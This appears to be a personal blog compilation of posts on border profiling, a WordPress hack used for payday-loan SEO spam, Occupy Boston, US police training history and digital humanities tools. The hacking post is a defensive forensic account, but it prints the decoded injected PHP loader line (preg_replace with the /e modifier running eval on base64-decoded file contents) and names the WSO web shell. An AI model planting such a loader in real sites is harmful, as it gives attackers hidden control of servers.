Skip to content

Arizona and Bad Bentheim

There were between twenty and thirty people on my car of a Berlin-bound train from Amsterdam. The train was taking a ten minute break in Bad Bentheim, the first stop in Germany after passing out of the Netherlands. As is the case with so many European borders today, the shift from one country to another can easily escape the notice of a traveler, until perhaps they catch on that the announcements have switched from Dutch and English to German and English. Though this was not true for the whole train, all the passengers in my car were fairly pale skinned northern European-looking sorts with two exceptions. One dark-tanned guy with some Spanish writing on his shirt had stepped off the train for a cigarette. The second racially distinct passenger sat in front of me, a middle-eastern looking guy wearing some fancy looking jeans and an Italian national football jersey. Whereas I had a large backpacker’s pack and a somewhat disheveled look, he had no luggage around him and was browsing the music selection on his cellphone.

Two police officers boarded the train and walked through my car looking at the people in each seat. Only later did I realize that this is was what counts for border control within the Schengen Area these days.

Of all the over two dozen people in my car, the two officers spoke to only one person. They asked only one passenger where he was going, where he was coming from, how long he intended to stay there, and where his luggage was. They asked only one passenger to produce his passport and then subjected each and every one of its pages, most of them blank, to close inspection. They were polite, respectful, and spoke excellent English. When they found nothing wrong with his Italian passport, they handed it backed, wished him a good journey, and moved on to the next car.

Though the man sitting in front of me didn’t seem annoyed by the encounter, I couldn’t help feeling a shiver run down my back and an anger swell within me. I was reminded that this happens every day, all over the world, in all sorts of context, and that however rational it might seem to the one asking for the documents, racial profiling is unjust, pure and simple.

A Tale of East Asian History, British Loan Sharks, and a Russian Hacker

A few weeks back I woke up at 6:30 in the morning to a phone call.

“I would like to buy your domain froginawell.net. $500, what do you say?”

I instinctively tried to answer in a voice that did not reveal the fact I had just been jolted out of deep sleep. There may have been a few introductory sentences preceding this very forward proposition but I wasn’t fully conscious yet.

Frog in a Well is a site I created back in 2004 to host a few academic weblogs about East Asian history authored by professors and graduate students. I haven’t been posting much there while I finish the PhD dissertation, but some of my wonderful collaborators have been keeping it active. Since we have a good stock of postings on a wide range of topics in East Asian history, the site attracts a fair amount of traffic, especially from those searching Google for “ancient Chinese sex” or, apparently, “Manchu foot binding.” I think these visitors find the resulting links insufficiently titillating for their needs. Our site has been ad free, however, and I fully intend to keep it that way.

I turned the gentleman down and went back to sleep. When I reached the office, I saw an email from the man, let’s call him Simon. He made the same direct offer, which came in a few minutes before he called. I replied to his email and explained I had no wish to sell the domain.

A week later Simon emailed again. This time he wanted to rent my domain.

Looks like someone’s tried to hack you unless you have changed your home page title?? Anyway your ranking has increased for my key phrase and I really want to rent that home page. I will increase my offer to $150 PER DAY.

$150 per day? Key phrase? What key phrase did Frog in a Well offer him? His email address suggested he worked at a solar energy company in the UK. The site looked legitimate, offering to set up solar power for homes for a “reasonable price.” I searched in vain for any clue as to why he would want the domain froginawell.net. I did a search on our site for anything to do with solar power or energy. Nothing stood out. I didn’t want to ask him, since I didn’t want to get his hopes up.

As for the hacking, this had happened before. Sometimes I have been a little slow in getting our WordPress installations upgraded and twice before our blogs have been hit with something called a “pharma hack.” This insidious hack leaves your website looking just like it did before but changes its contents when Google searches your site, changing all blog posting titles into advertisements for every kind of online drug ordering site you can imagine. It is notoriously difficult to track down as the hackers are getting better and better at hiding their code in the deep folder hierarchies of WordPress or in un-inspected corners of your database.

This time, however, it looked like there was no pharma hack. Instead, my home page for froginawell.net had been changed from a simple html file into a php file, allowing it to execute code. The top of the file had a new line added to it with a single command with a bunch of gibberish. At the time, I had no time to look at it in depth. I was trying to wrap up the penultimate chapter of my dissertation. I removed the offending text, transformed my home page back into html, changed the password on my account, reinstalled the China blog from scratch (which had been hacked before), and sent an email to my host asking for help in dealing with a security breach. My host replied that they would be delighted to help if I paid them almost double what I was currently paying them by adding a new security service. Otherwise, I was on my own.

After my rather incomplete clean up based on where I thought the hacked files were, I replied to Simon, “The offer is very generous, but I’ll pass. I’ve decided to keep our project ad-free.”

Simon wrote back again the same day. He was still seeing the title of my hacked page on Google. I couldn’t see what he was talking about when I searched for Frog in a Well on Google, but assumed he was looking at some old post that had been cached by Google back when it was in its hacked form. Simon wrote:

Do you realize why people are suddenly trying to hack you? Because of the earning potential your site currently has.

I would appreciate if it you would name your price because everyone has one and I don’t want either of us to miss this opportunity. I can go a somewhat higher on the daily fee if it would strike a deal between us. How about $250 per day. If money is no object then donate the $250 a day to charity.

$250 a day? This was downright loopy and getting more suspicious all the time. I was traveling over Memorial Day weekend at the time. If the offer was real, and I was willing to turn the Frog in a Well homepage into someone’s ad, it still would have been a pain for me deal with, and it all was too fishy. I turned him down and told him I thought the matter was closed, I wouldn’t accept ads on Frog in a Well for any price.

Simon wrote back one last time.

As a businessman I always struggle with the concept of no available at any price when it comes to a business asset. However, I respect your decision and will leave you with this final message. I will make one final bid then will be out of your hair if you decide you do not want it. $500 per day payable in advance. Practically $200,000 a year.

He was clearly perplexed at my refusal to behave like a rational economic actor. I completely understand his frustration. Perhaps he hasn’t met many crunchy socialist grad student types. I wrote him back a one-liner again turning down his offer but wishing him luck with his business, which, at this point, I still assumed was a solar power company.

When I got home, I determined to resolve two mysteries: 1) what was Simon seeing when he found Frog in a Well on Google in its hacked state? 2) Why on earth would Simon want to go from $500 total to buy my domain to $500 a day to rent it?

The first thing I discovered was that my site was still compromised. The hackers had once again modified my home page, turned it into a .php file and added a command at the top that contained lots of gibberish. Their backdoor did not reside, as I had assumed, in the oldish installation of the China blog I had replaced but somewhere else. I would have to have a go at reverse engineering the hack.

Anatomy of a Hack

The command that the hackers added to the top of my home page was “preg_replace” which in PHP simply searches some text for a term, and replaces it with some other text.

preg_replace("[what you are searching for]","[what you wish to replace it with]","[the text to search]")

In this case, all of this was obscured to me with a bunch of gibberish like “\x65\166\x61\154”. This text is actually just an alternating mix of ASCII codes in two different formats, decimal and hexadecimal. PHP knows not to treat them like regular numbers because of the escape “\” character, followed by x for the hexadecimal numbers. You can find their meanings on this chart. For example, the text above begins with \x65, which is the hexadecimal for “e” and then the decimal for “v” and back to hexadecimal for “a” and then finally decimal for “l,” all together “eval”

This makes it extremely difficult for a human such as myself to see what is going on, but perfectly legible to the computer. I had to restore all the gibberish to regular characters. I did this with python. On my Mac, I just opened up the terminal, typed python, and then printed out the gibberish ASCII blocks with the python print command:

print("[put your gibberish here]")

This yielded a command that said:

Look for: |(.*)|ei
Replace it with: eval('$kgv=89483;'.base64_decode(implode("\n",file(base64_decode("\1")))));$kgv=89483;
In the text: L2hvbWUvZnJvZ2kyL3B1YmxpY19odG1sL2tvcmVhL3dwLWluY2x1ZGVzL2pzL2Nyb3AvbG9nLy4lODI4RSUwMDEzJUI4RjMlQkMxQiVCMjJCJTRGNTc=

Now I was getting somewhere. But what is all this new flavor of gibberish at the end? This text is encoded using the Base64 encoding method. If you have a file (only) with Base64 encoded text you can decode it on the Mac OS X or Linux command line with:

base64 -i encoded-text.txt -o outputed-decoded.txt

You can also decode base64 in Python, PHP, Ruby, etc. or use an online web-based decoder. Decoded, this yielded the location of the files that contained more code for it to run:

[…]public_html/korea/wp-includes/js/crop/log/.%828E%0013%B8F3%BC1B%B22B%4F57

It wasn’t alone. There were a dozen files in there, including text for an alternate homepage. The code in my home page, with a single command up front, was running other commands hidden in a folder deep in the installation of my Korea blog. Even these filenames and their contents were encoded with a variety of methods including base64, md5 encryption, characters turned into numbers and iterated by arbitrary values, and various contents stored in the JSON format. I didn’t bother working out all of its details but it appears to serve a different home page only to Google and only under certain circumstances.

One of the hacked files produced a version of the British payday loan scam speedypaydayloan.co.uk, which connects back to a fake London company “D and D Marketing” which can be found discussed various places online for its scams. In other words, for Britain-based, and only Britain-based visitors to Google who were looking for “payday loans,” a craftily hacked homepage at Frog in a Well was apparently delivering them to a scam site or redirecting to any one of a number of other sites found in a large encoded list on my site.

I soon discovered that these files were not the only suspicious in the Korea blog installation, however. These were just the files which produced the specific result desired by the hacker. After a lot more decoding of obscured code, I was able to find the delivery system itself. To deploy this particular combination of redirection and cloaking of that redirection, the attacker was using a hacker’s dream suite: something called “WSO 2.5.” Once they found a weakness in an older version of wordpress on my domain, they were able to install the WSO suite in a hidden location separate from the above hack. Though I don’t know how long this Youtube video (without sound) will remain live, you can see what the view of the hacker using WSO looks like here. The actual PHP code for a plain un-obscured installation of the backdoor suite that was controlling my server can be found (for now) on pastebin here.


Click to enlarge the image

Simon and Friends

So how does this connect back to our friend Simon and his solar power company? Google webmaster tools revealed that the top search term for Frog in a Well was currently “payday loans” and it had shot up in the rankings some time in early May when the hack happened, with hundreds of thousands of impressions. Something was driving the rankings of the hacked site way up.

Simon had written in one of his emails that he had “many fingers in many pies” which suggested that he was working with more than just a solar power company. After figuring out what my hacked site looked like, I searched for his full name and “loans uk” and soon found that he (and often his address) was listed as the registrant for a whole series of domains, at least one of which had been suspended. These included a payday loan site, a mobile phone deal website, a home loan broker, a some other kind of financial institution that no longer seems to be around, and another company dedicated to alternative energy sources. My best guess is that Simon’s key phrase was none other than “payday loans” and he saw a way to make a quick buck by getting one of his financial scams advertised through the newly compromised Frog in a Well domain. Was he really serious about paying that kind of amount? What had been his plan for how this was going to pan out? Did he know that the Google ranking was probably a temporary result of a deeply hacked site?

Simon’s offer of $500 was not the last. I removed all the hacker’s files, installed additional security, changed passwords, and began monitoring the raw access files of my server. I requested a review of my website by Google through the webmaster tools that hopefully will get me out of the payday loan business in the UK. However, the offers continued to come in.

Luke, one of Simon’s competitors (again, I’m changing all names), wrote me a polite email with a more forthcoming offer that confirmed what I had found by poking through the files:

You may not be aware but your site has been hacked by a Russian internet marketing affiliate attempting to generate money in the UK from the search term “payday loans”…As a rough indicator this link is worth around $10,000 a week to the hacker in its current location. We are a large UK based competitor of this hacker and whilst we don’t particularly his activity, we’d like to stop him benefiting from this by offering to replace this hyperlink on your site which he has inserted and pay you the commissions weekly…

It was “clever stuff,” he explained, “but very illegal.” I turned him down politely.


Click to enlarge the image

No sooner had I cleaned up my server, it began to come under DOS attack (denial of service). The three blogs at Frog in a Well were hit by about a dozen zombie bots from around the world who tried to load the home page of each blog over 48,000 times in the span of 10 minutes. My host immediately suspended my account for the undue stress I was causing to their server. They suggested buying a dedicated server for about 10 times the price of my current hosting. I had moved to the current host only a year earlier when our blogs came under DOS attack, mostly from China, and the earlier host politely refused to do anything about it. My current host was kind enough to reinstate the site after a day of monitoring the situation but there is nothing to prevent an attacker from hiring a few minutes of a few bots to take down the site again. It is a horrible feeling of helplessness that can really only be countered with a lot of money – money I was not about to attempt to make by entering the payday loan business. To add a show to the circus, within hours of being suspended two separate security companies contacted me, promising protection against DOS attack and asked if I wanted to discuss signing up for their expensive services. How did they know I had been attacked by DOS in the first place and not suspended for some other reason?

A few days later, yet another payday loan operator, let us call him Grant, had contacted me through twitter. He explained that the “Russian guy” who he believed had hacked me was likely “untouchable for his crimes” thanks to his location but again suggested that we “take advantage of this situation” and split the proceeds of linking my site to him 50/50.

I will pay you daily, depending on how much it makes either by Paypal or bank transfer. As an indication of potential profits, when I have held 1st place I have been regularly making £15,000 per day. I can see your site bouncing around the rankings so I am unsure how much it would make… I suspect it would be comfortably into 4 figures a day but without trying I can’t say for sure.

I turned him down and explained that I had cleaned out the hack. It would take some time before this would be reflected on Google. However, in response to my request for more information about what he knew about the hack, Grant kindly sent me a long list of other sites that been hacked by my attacker but whose only role in this game was to backlink to Frog in a Well with the link text “payday loans” so that Google would radically increase my ranking. Luke had suggested that this approach was only effective because Frog in a Well was already a relatively “trusted” site by Google. Grant (emailing me directly from the beach, he said, which I guess is a good place for someone pulling in thousands of pounds per day on this sort of thing) also supplied me with half a dozen other sites that were now being subjected to the very same cloak and redirect attack. He speculated that I had come under DOS attack from one of his other competitors who, instead of attempting to buy my cooperation, had spent the negligible cost required to simply knock me off the internet.

Hopefully my ordeal will be over soon, and I need merely keep a closer eye on my servers. For Grant, Luke, and Simon, however, their Russian nemesis continues his work. A last note from Grant reported,

There is an American radio station ranking for payday loans on google uk now, so that’s yet more work for me to try and undo lol.

Notes from A Solidarity March with Occupy Boston

On Monday I joined in the Student Solidarity March for Occupy Boston together with a few friends and I thought I would share a few notes.

I don’t have much experience with protesting. Though I consider myself active politically, I have joined less than half a dozen large protest rallies and marches, and almost all of them were related to the issue of immigration. It was a fascinating experience, differing in many ways from other protests I had joined before but again, due to my small sample size, it is very possible that some of the elements described below are, in fact, common features and my observations reveal the ignorance of a tourist.

Harvard University Occupies Boston

The first scene was at Harvard. Before converging on the Boston Commons where the main march was to begin, students from around the city gathered at their own university. Harvard and MIT students were, at least according to posters and emails before the gathering, to assemble together and occupy the subway (since we were apparently too lazy to walk the hour or so downtown). The initial assembly point was at the wonderfully neutral location of the John Harvard statue inside the Harvard campus (meeting at MIT would have put us much closer to the main march). I showed up wearing a Columbia shirt to break the Crimson tide, thus, of course, completely sparing me any elitist stain. Instead of hiking up deep into our territory, our MIT friends made it downtown in a few separate groups, presumably in flying cars, teleportation devices, or astride their communally shared fleet of robot dogs.

Harvard University Occupies BostonThe poster for the event advertising “Harvard University Occupies Boston” was the first reminder of the somewhat awkward positionality of our merry band. Of course Harvard University already, in a very real sense, Occupies Boston through the power the university itself wields, what it represents, but most directly through the many graduates of the university who heavily populate the ranks of the financial, consulting, and law firms throughout the city. This awkwardness would continue to be manifested whenever the slogan “We are the 99%” was yelled. We debated among ourselves the intricacies of how that phrase might be construed to include or exclude us. Should we write self-criticisms, joked one, but the idea may well have received a warm reception if put to the crowd.

Hallelujah and The People’s Mic

Somewhere between 50 and 5000 people showed up at John Harvard statue, but as you know, counting attendance at protests is an inexact science. Before we boarded the subway downtown, there were posters to be made, and an opportunity for discussion.

The Occupy Boston and Occupy Wall Street movements are extremely decentralized, with diverse groups and diverse goals represented. It is thus easy to mock and hard to categorize. It is becoming harder, however, to ignore it and I joined in order to express my support but also try to better understand it. If the political goals are still varied, there seems to be, at least, a set of common practices emerging. Let me list a few of them:

Many Groups, One Shopping List – Despite the diversity, they seem to be incredibly organized online, where you can find news, a press kit, a garbage collection schedule, general assembly videos, and even a unified shopping list.

The People’s Mic – Though our pre-march discussion was too short to see it fully in action, direct democracy assemblies are designed to allow anyone to speak. In order to make sure that everyone can hear the speaker, everything spoken was repeated by the crowd; phrase by phrase. I’m told this comes from the Occupy Wall Street protests, where a ban on voice amplifying devices made the innovation necessary. To speak before the group you add your name to a “stack” (waiting list) which one of the facilitators manages. When it is your turn you yell, “Mic Check!” and the crowd responds with “Mic Check!” After that, every phrase you utter will be repeated by the crowd, though I noted that when more extreme or controversial things were said, the mass echo was notably less enthusiastic. It is a fascinating technique, which surely makes long political meetings slightly more than twice as long, but for this very reason it encourages brevity and clarity in a speaker. The effect can be an intoxicating experience, but also very empowering. The nagging Orwellian feel of the robotic repetition is well mitigated by the fact that you are not repeating the words of “The Leader,” but of everyone who speaks. Rachel Maddow describes the practice and shows examples:
People’s Mic! Today’s Best New Thing in the World

Gesturing the Revolution – The first task carried out by the “facilitators” at the Harvard Statue (who nominated these people to be our facilitators and what organizations they came from was not, as far as I can remember, ever revealed) was to give us a basic education in crowd communication. After explaining the People’s Mic they introduced us to a system of hand signals I have never seen before but which has been commented upon in various media reports. Our lesson included the following instructions:

1. If you agree with what a speaker is saying raise your hands and wiggle your fingers. If you had not been told this was its purpose, you might suspect the person was offering a “Hallelujah!”
2. If you are more ambivalent about what a speaker is saying, you wiggle your fingers in front of your chest
3. If you disagree with the speaker, you hold your hands in front of your chest and flop them down in a motion that to me looked looked like a begging dog
4. If you wish to ask a clarifying question you hold up your hand and make the letter “C”
5. If you wish to make a “process point” which I guess is a kind of point of order, you make another hand signal that I believe resembles a triangle or perhaps a “T”.
6. If you find what the speaker is saying offensive, you cross your arms over your head, creating a large “X”

At this point an apparently experienced protestor in the audience asked why they did not use a common gesture to indicate that you wanted to make a direct counter-point. One of the leaders—I’m sorry—facilitators, made the reasonable point that this was because that gesture makes it impossible to have smooth discussions without them devolving into rowdy debates. Instead people who disagreed were to add their name to the “stack” and speak in turn.

Now trained in the semiotic arts of the revolution, we began a discussion and a few people on the “stack” spoke, but besides a few Hallelujahs, we didn’t get to deploy the full range of acquired vocabulary before leaving for downtown.

Does anyone know more about the origins of this system? In addition to serving as a system of immediate speaker feedback this appears to be the primary system used for consensus formation at protest general assemblies; a non-binary process known as a “temperature check.” I have seen mention of it in reference to the recent student protests in London. This Guardian article includes a great gesture for “I’m bored” which I must remember to deploy at appropriate moments in academic lectures. I see gestures like those we learned described in Consensus: A New Handbook for Grassroots Social, Political, and Environmental Groups but that work argues strongly against having any gestures of a negative kind in order to reduce speaker anxiety and create a more welcoming environment.

Lawyer Tags – Several people moved through our group of protesters distributing little tags for us to tie to our arms. On one side was information about our protest, the protest facebook page, Google group, and a contact email. On the other side was the telephone number for the National Lawyers Guild, an important but nothing if not radical legal organization that supports protesters in their encounters with law enforcement. In the event of an arrest, all of our belongings may be confiscated or discarded so this little tag was a nice little reference card. We were also encouraged to copy the phone number onto our arm since the tag might be easily lost. Lawyer Tags

I should note that both while we were being told about the tags and later on the Boston Commons, there was a repeated and strong emphasis on showing respect for law enforcement, non-violence, and following the law (except, I guess, those we break). Which brings me to another fascinating innovation that I have only seen glimpses of in the news before:

Legal Observers – When we got to the assembly point on the Boston Commons there were bands playing, the usual anarchists occupying the central gazebo (demonstrating once again the principle that the early herd gets the gazebo), and a wide array of people around the edges. As each new university group arrived (Tufts and U Mass had particularly strong showings, with the latter taking full advantage in their slogans of the fact the word “mass” is in their name) everyone cheered their arrival. Before the full march began, however, more facilitators (again, I have no idea who they were or what organizations they represented) gave us more training through the People’s Mic. They pointed to a number of neon hat and vest clad individuals hovering around the edges of our mass, just in front of a row of police officers observing us. These were to be our “legal observers” tasked with the job of being neutral observers of the protest. They would monitor the behavior of the protesters, and especially observe any clashes or interactions between the protest and law enforcement. Since I believe at least some of them were from the National Lawyer’s Guild, I have some doubts about their neutrality, but overall, I must say, I was quite impressed by their number, and I think their presence throughout the march on the sidelines was a great comfort, even if no one expected a clash with the police.

Protest as Socializing Process

My overall experience on Monday was very positive. The energy, most of it positive, and the diversity of the people involved left a strong impression on me. The slogans were often too pointlessly populist, dry or cliche, and clearly many of us were just a bit confused about what the whole experience added up to. We marched down to the occupied Dewey Park and circled around it. Later that night, some students and others who decided to join the “occupation” were arrested by the police and I’ll await more accounts of what transpired before commenting on it. I do hope the occupation continues, even if it does not graduate beyond the realm of political experiment, and that it evolves and develops politically.

There are a whole slew of ways this movement is being described and justified by its sympathizers and participants alike. I have not yet formed a strong opinion on how best to conceptualize it, but I feel that at least on two levels there is something important happening. From the outside, as long as the “occupy” movement continues and grows without becoming violent, it has a place at the table of political discussion. Its destabilizing effect can play a very important part in a stalled political process. Even if its internal unity remains dependent upon its ambiguity, it is like the tormented Poe’s Raven which, “never flitting, still is sitting, still is sitting / On the pallid bust of Pallas just above my chamber door.”

From the inside, even from the limited contact I had with the movement on Monday, participation in a movement like this, and many like it, is a socializing process, especially when it is full of innovative approaches: socializing participants but also teaching them a set of valuable political practices that can, in turn, be deployed again and again with greater focus in a whole range of circumstances. Monday was a holiday, but I very much felt like class was in session.

San Martin and Maoland – US Training of Police in the Art of Crushing Protests

Watching the events as they unfold in Egypt and earlier in Tunisia, I have been fascinated by the evolving role of the police. Though also true in the Tunisian case, the Egyptian police has long been particularly infamous for its rampant use of torture, a fact sometimes taken advantage of by the US. These police forces recently revealed their complete incompetence and senseless cruelty to the world as plentiful footage showed its beatings, lethal use of vehicle charges, and its ultimate dissolution in the face of massive protests in major cities across the country. Since then, at least some of its officers appear to have shed their uniforms and re-engaged with hired or sympathetic government supporters.

While we are constantly reminded of US connections to the Egyptian military, these events remind me of the history of US ties to repressive police institutions around the world that would clearly recognize their own behavior on Al Jazeera footage and in countless Youtube clips uploaded in the past week or two. Throughout the Cold War, but especially from 1962 to the mid-1970s, the United States engaged in an intensive effort to train police from allied states on a scale not seen again until the Afghanistan and Iraq wars. Run primarily through the Office of Public Safety (OPS) and funded by USAID, this campaign was never primarily a matter of generally developing police efficacy and professionalism, though many OPS police advisors and USAID officials were personally committed to these causes commitments to these causes. From the beginning, this effort was defined as the core of a counter-insurgency strategy designed to thwart “interests inimical to the United States” threatening friendly regimes before they become powerful enough to require full military intervention. The organization was heavily infiltrated by CIA officers who were placed there under the guidance of Byron Engle, the OPS director and a former CIA operative himself.1

One important center of the police training provided by the US during the 1960s and 1970s was the International Police Academy (IPA) which was housed in the “Car Barn,” a building complex which now houses offices for Georgetown University in Washington D.C. Though accusations abound, I have not found any persuasive evidence that torture techniques were taught or tolerated at the academy, and it seems clear that, on the contrary, many US instructors went out of their way to deplore the use of torture and argue that it is inefficient, ineffective, and highly damaging to civil-police relations. It is also clear, as several accounts I have read claim, that many of the students disagreed with their instructors, and openly debated the virtues of torture with each other even while in attendance. There is much more to be said on this, but here I wish to introduce one anecdote I came across about the IPA in A. J. Langguth‘s 1978 book Hidden Terrors which reveals the degree to which US training was explicitly designed to help its allies maintain a lock on power in the face of a protesting opposition.

San Martin and Maoland

The IPA designed a number of exercises to test the ability of police officers to respond to a political threat in the imaginary country of San Martin. Neighboring this state was the diabolical Maoland, which was always trying to spread revolution. In the exercises IPA faculty would play the role of Maoland infiltrators while students were split into those who assisted in plotting revolution, those crushing the uprising, and those who judged between the two.

In one exercise Langguth recounts, an aerial photograph of Baltimore served as a map of San Martin, and demonstrations organized by the Maoland revolutionaries were plotted out on it. One part of the exercise came to mind as journalists and human rights activists were rounded up in Cairo yesterday. As the student police proceeded to execute their plans, if things were too easy, IPA instructors would call in and declare, posing as Prime Minister, “My problem is the reporters on the scene. They’re getting in the way and interfering with our police work.” (p129) If the police stalled, they would call in with this same complaint several times, and a student police chief would finally respond, “All right…arrest them! Bring them in!” This would give the students ten minutes of relief before more demands for specific actions would come over the phone.

Apparently, the students really enjoyed the San Martin and Maoland role-playing opportunities though they complained that the communications and anti-riot equipment deployed in the exercise was rarely available to them at home (130). Senior officers found the exercises nerve wrecking since their actions could be immediately judged by their peers, potentially including younger or less experienced policemen.

Films apparently were often used in training, including one filmed in Panama but claiming to again be in the midst of a politically unstable San Martin. Other movies like The Use of Tear Gas to Preserve Order served as marketing material for the Lake Erie Chemical Company (one wonders if the Combined Systems International of Jamestown Pennsylvania, which supplied tear gas to the Egyptians has similar marketing films provided to its Egyptian customers?). Another movie mentioned both in Langguth’s Hidden Terrors and in a Congressional Report dated February, 1976 is the “Battle of Algiers.” This is a fantastic movie but also a highly complex one from which a whole range of lessons can be drawn. I came away from it horrified by the images of torture used and defended by the French as well the terrorism of the FLN and other non-state actors.

The congressional report, written as the US began to wind down its police training efforts or shift them to function under the guise of anti-narcotics efforts, investigated accusations of torture training being carried out at the IPA. The showing of “Battle of Algiers” in an interrogation class was the closest they came to finding anything controversial, due to the film’s depiction of “questionable techniques of extracting information” but noted that the academy protested that the movie was designed to “bring out how abhorrent inhumane methods of interrogation can be.”2 That could well be true, as my own reaction to the film suggests, but it may also have provided a pretext for students, many of whom had plentiful experience in carrying out the kinds of techniques shown in the movie, to weigh in on their thoughts. It all depends on how the instructors handled it.

Though not connected to the San Martin and Maoland exercises, I mention this movie because it had an ironic connection with the demise of the Office of Public Safety. The script writer for “Battle of Algiers,” Italian Communist Party member Franco Solinas, wrote the script of the 1975 movie which cast unwanted light on the OPS. The film, “State of Siege” was also set in a fictional Latin American country (though based on real events in Uruguay), but this time, instead of depicting brave police efforts to crush a rebellion, it incorporated many of the accusations and rumors of direct US police advisor involvement in torture.3 Though I am not convinced the more sensationalist accusations leveled against the OPS involvement in torture are true, its advisors came into daily contact, as US soldiers and operatives in Iraq and Afghanistan do, with allied security forces who openly discussed and engaged in intolerable acts of brutality.

Today’s San Martin is Egypt, an American ally of critical importance to protecting its interests in the Middle East. The Maoland infiltrators, as Egyptian state television would have its audience believe, are on the streets promoting the subversive interests of foreigners. I hope the United States comes to the crystal clear observation that history will, in this case too, not treat its connection to this brutal regime kindly and more importantly, neither will the Egyptian people.

  1. I am deeply interested in Byron Engle due to his leading role in Japanese police reforms and only recently came across his long career as a Cold Warrior after he left Japan. []
  2. See “Stopping US Assistance to Foreign Police and Prisons” 16. OPS head Byron Engle denied the movie was ever shown at IPA in an interview with Langguth. Hidden Terrors, p324. []
  3. This is discussed in Langguth’s Hidden Terrors, 304-308. []

Little dh and Planting Seeds

The following is reposting of an entry I contributed to the THATCamp New England blog:

I am excited to have the opportunity to join THATCamp New England this November and look forward to learning from everyone I meet there. I was asked to post an entry here about the issues that I hope will be discussed at the event. I have no doubt many of the main themes I’m interested in will receive plentiful attention but I would like to bring up two issues that I find of particular importance: 1) the continued need for the appreciation of and promotion of what I’ll call the “little dh” of the digital humanities and 2) an action oriented discussion about the need to plant seeds within each and every department that promotes the cultivation of both real skills and the requisite appreciation for a spirit of experimentation with technology in the humanities not merely among the faculty but even more importantly as a part of the graduate curriculum.

Little dh

I have been unable to keep up with the ever-growing body of scholarship on the digital humanities but what I have read suggests that much of the work that has been done focuses upon the development of new techniques and new tools that assist us in conducting research and teaching in the humanities in roughly four areas: the organization of sources and data (for example Zotero, metadata practices), the analysis of data (e.g. using GIS, statistical text analysis), the delivery and representation of sources and research results (e.g. Omeka) and effective means for promoting student learning (e.g. teaching with clickers, promoting diverse online interactions).

I’m confident that these areas should and will remain the core of Digital Humanities for the foreseeable future. I do hope, however, that there continues to be an appreciation for digital humanities with a small “d” or little dh, if you will, that has a much longer history and I believe will continue to remain important as we go forward. So what do I mean by little dh? I mean the creation of limited, often unscalable, and usually quickly assembled ad hoc solutions tailored to the problems of individual academics or specific projects. In other words, hacks. These solutions might consist of helping a professor, student, or specific research project effectively use a particular combination of software applications, the writing of short scripts to process data or assist in creating workflows to move information smoothly from one application to another, the creation of customized web sites for highly specialized tasks, and so on. These tasks might be very simple such as helping a classics professor develop a particular keyboard layout for a group of students or particular project. It might be more complex, for example, involve helping a Chinese literature professor create a workflow to extract passages from an old and outdated database, perform certain repetitive tasks on the resulting text using regular expressions, and then transform that text into a clean website with automatic annotations in particular places.

The skill set needed to perform “little dh” tasks is such that it is impossible to train all graduate students or academics for them, especially if they have little interest or time to tinker with technology. “Little dh” is usually performed by an inside amateur, for example, the departmental geek, or with the assistance of technology services at an educational institution that are willing to go beyond the normal bounds of “technical support” defined as “fixing things that go wrong.” Unfortunately, my own experience suggests that sometimes the creation of specialized institutes that focus on innovation and technology in education has actually reduced accessibility for scholars to resources that can provide little dh instead of increased it because it is far more sexy to produce larger tools that can be widely distributed than it is to provide simple customized solutions for the problems of individual scholars or projects. One such center to promote innovative uses of technology in education I have seen in action, for example, started out providing very open-ended help to scholars but very quickly shifted to creating and customizing a very small set of tools that may or may not have been useful for the specific needs of the diverse kinds of scholarship being carried out in humanities. There is a genuine need for both, even though one is far less glamorous.

I hope that we can discuss how it is possible to continue to provide and expand the availability of technical competence that can provide help with little dh solutions within our departments and recognize the wide diversity of needs within the academic community, even as we celebrate and increasingly adopt more generalized tools and techniques for our research and teaching.

Planting Seeds

I have been impressed with progress in the digital humanities amongst more stubborn professors that I’ve come across in three areas: 1) an increasing awareness of open access and its benefits to the academic community, 2) an appreciation for the importance of utilizing online resources and online sites of interaction, and 3) the spread of use of bibliographic software amongst the older generation of scholars. This is, to be honest, the only areas of digital humanities that I have really seen begin to widely penetrate the departments I’ve interacted with both as a graduate student and earlier as a technology consultant within a university. I’m now convinced the biggest challenge we face is not in teaching the skills needed to use the software and techniques themselves to the professors and scholars of our academic community, but the pressing need for us to, as it were, “poison the young,” and infect them with a curiosity for the opportunities that the digital humanities offer to change our field in the three key areas of research, teaching, and most threateningly for the status quo, publishing.

There are a growing number of centers dedicated to the digital humanities but I wonder if we might discuss the opening of an additional front, (and perhaps such a front has already been opened and I would love to learn more of it) that attempts to plant a seed of digital humanities within every university humanities department, by asking graduate students to take, or at least offering them the opportunity to take, courses or extended workshops on the digital humanities that focus on: some basic training in self-chosen areas of digital humanities techniques and tools, the cultivation of a spirit of experimentation among students, and finally a more theoretical discussion on the implications of the use of digital humanities for the humanities in general (particularly on professional practices such as publishing, peer review, and the interaction of academics with the broader community of the the intellectually curious public). Promoting the incorporation of such an element into the graduate curriculum will, of course, be a department by department battle, but there are surely preparations that can be made by us as a community, that can help arm sympathetic scholars with the arguments and pedagogical tools needed to bring that struggle into committee meetings at the university and department level.

Zotero and DEVONThink

I have a bibliographic database in Zotero. The citation information is easy to scrape from web databases such as my own library, Amazon, and the many journal databases that I use. It is convenient to be able to tag and organize my sources and can use Zotero to format footnotes and bibliographies for my dissertation and other papers.

I recently shifted my note taking to a knowledge database called DEVONthink and as I recently discussed here, I created a special template script to add individual note files (like note cards in the old days) for each fragment or note I take on a source and keep them in a folder with, and linked to a main overview note file for the source. Each fragment created duplicates the tags of the main note file.

Automating a Zotero to DEVONthink Workflow with Applescript

I thought it be nice to automate the creation of a folder and a main note file in DEVONthink for each and every source I have in my Zotero database with a script. I also thought it would be nice if the script brought over any and all tags the source had in Zotero, including tags for whatever collections the source was found in. Finally, I wanted the script to only create folders and note files for those sources that I did not already have a folder for in DEVONthink so that I can run the script every once in a while to keep it synced with my Zotero without too much difficulty.

I created such a script this evening and it can be downloaded here:

Zotero to DEVONthink (Version 1.6 2010.10.16)

To use it:

1. Download and unzip the script

2. Open it in the Applescript Editor and edit the two configuration variables (the name of the group you want to put all the source folders and note files in, and the location of your Zotero database)

3. Put a copy of the saved script into your DEVONthink scripts folder and run it every time you want to import Zotero all your entries or, thereafter, check if there are new sources to be added.

4. Please read my notes in the script for more details on how it works and some things to keep in mind.

Note to developers who can do better:

My script accomplishes its task by using sqlite3 shell commands to directly query the Zotero database. While this is read only and seems to work fine, this is not the most graceful way of going about this.

Zotero has an open API and a developer who is less of an amateur than I could probably think of some effective way of using applescript and perhaps a combination of something else like a Firefox plugin to talk to this API directly in Firefox and get information out of the database that way, which is recommended by the Zotero team. Read more here, here, and here.

